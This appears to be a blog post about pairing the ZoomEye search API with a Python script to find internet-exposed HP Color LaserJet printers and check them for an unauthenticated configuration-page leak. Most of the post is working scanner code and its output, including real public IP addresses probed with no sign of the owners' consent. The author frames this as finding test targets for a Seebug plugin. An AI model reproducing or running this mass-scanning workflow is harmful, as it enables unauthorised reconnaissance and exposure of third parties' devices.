Presumably everyone is familiar with ZoomEye. If the name is unfamiliar, Shodan surely is. If not that either, then Google certainly is. Otherwise you would not be reading this article. 233333, just a joke. But as I say, you probably know what ZoomEye is. If you don't, please look it up on Baidu. I'll wait for you to come back ~
So what is today's topic, after all that rambling? The show starts below.
I had a fairly confidential task, and wrote an SDK for the ZoomEye API along the way. Around the same time I wrote a plugin for Seebug that detects an IoT device vulnerability. Then I got stuck looking for a site to test the plugin against. I couldn't find one anywhere.
So weren't you saying that ZoomEye is so badass?
That's right!!!
That's it. I used the SDK I wrote to work with the open API. Then:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import requests
    import zoomeye.zoomeye as zoomeye

    test = zoomeye.zoomeye()
    username = 'your ZoomEye account e-mail'
    password = 'your ZoomEye account password'
    # Log in through the SDK; the API returns an access token
    token = test.login(username, password)

So now I've logged in to ZoomEye. What? You say you don't believe me?

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import requests
    import zoomeye.zoomeye as zoomeye

    test = zoomeye.zoomeye()
    username = 'your ZoomEye account e-mail'
    password = 'your ZoomEye account password'
    token = test.login(username, password)
    # Web search for the device banner, first page, with app and os facets
    result = test.search('web', query='HP Color LaserJet', page=1, facets='app,os')
    print result

Tell me, what do you see?
Doesn't that make you instantly feel adorable ~
Then I wrote a script like this.

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import requests
    import zoomeye.zoomeye as zoomeye

    test = zoomeye.zoomeye()
    username = 'your ZoomEye account e-mail'
    password = 'your ZoomEye account password'
    token = test.login(username, password)
    result = test.search('web', query='HP Color LaserJet', page=1, facets='app,os')

    # Collect the first IP of every match returned by the search
    target = []
    for i in result:
        for x in i['matches']:
            print x['ip']
            target.append(x['ip'][0])

    for ip in target:
        try:
            payload = '/hp/device/InternalPages/Index?id=ConfigurationPage'
            url = 'http://' + ip + payload
            # A timeout keeps one unresponsive host from stalling the loop
            res_exp = requests.get(url, timeout=10)
            print '[-]checking url %s' % url
            # The configuration page is exposed if it loads and carries both markers
            if (res_exp.status_code == 200 and 'HomeDeviceName' in res_exp.content
                    and 'HomeDeviceIp' in res_exp.content):
                print '[+]%s is vul' % url
            elif res_exp.status_code != 200:
                print '[+]%s is static' % url
            else:
                pass
        except Exception:
            # Skip hosts that cannot be reached
            pass

And then the result is this:

    [-]checking url http://192.185.150.112/hp/device/InternalPages/Index?id=ConfigurationPage
    [-]checking url http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage
    [+]http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage is static
    [-]checking url http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage
    [+]http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage is static
    [-]checking url http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage
    [+]http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage is static
    [-]checking url http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage
    [+]http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage is static
    [-]checking url http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage
    [+]http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage is static
    [-]checking url http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage
    [+]http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage is static
    [-]checking url http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage
    [+]http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage is static

No use at all, ~_~.
Move on to the next page: modify the page parameter.
Because of my account level, a restriction policy applies here. When page is changed to 2, the result is:

    {u'url': u'https://www.zoomeye.org/api/doc#limitations', u'message': u'account is suspend, excceeding the 30% of total (7.5)', u'error': u'suspended'}

Then I tried the web version. Through unremitting efforts, eventually:
is vul
The plugin was submitted to Seebug.
ZoomEye + Seebug: radar plus artillery, dual-engine power.